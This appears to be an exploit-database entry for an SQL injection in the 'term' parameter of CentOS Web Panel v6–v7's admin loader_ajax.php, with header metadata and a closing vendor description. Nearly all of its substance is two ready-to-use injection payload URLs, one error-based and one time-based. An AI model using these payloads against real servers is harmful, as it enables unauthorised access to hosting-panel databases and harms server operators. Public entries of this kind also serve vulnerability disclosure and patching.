# Exploit Title: Centos WebPanel 7 - 'term' SQL Injection # Google Dork: N/A # Date: 2020-03-03 # Exploit Author: Berke YILMAZ # Vendor Homepage: http://centos-webpanel.com/ # Software Link: http://centos-webpanel.com/ # Version: v6 - v7 # Tested on: Kali Linux - Windows 10 # CVE : N/A # Type: Error Based SQL Injection # Payload: https://{DOMAIN_NAME}:2031/cwp_{SESSION_HASH}/admin/loader_ajax.php?ajax=dashboard&action=searchIn&term=a' AND (SELECT 1197 FROM(SELECT COUNT(*),CONCAT(0x716b6a7171,(SELECT (ELT(1197=1197,1))),0x71707a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- aRuO # Type: Time Based SQL Injection # Payload: https://{DOMAIN_NAME}:2031/cwp_{SESSION_HASH}/admin/loader_ajax.php?ajax=dashboard&action=searchIn&term=a' OR SLEEP(5)-- JCpP Centos-Webpanel (http://centos-webpanel.com/) CentOS Web Panel | Free Linux Web Hosting Control Panel Free CentOS Linux Web Hosting control panel designed for quick and easy management of (Dedicated & VPS) servers without of need to use ssh console for every little thing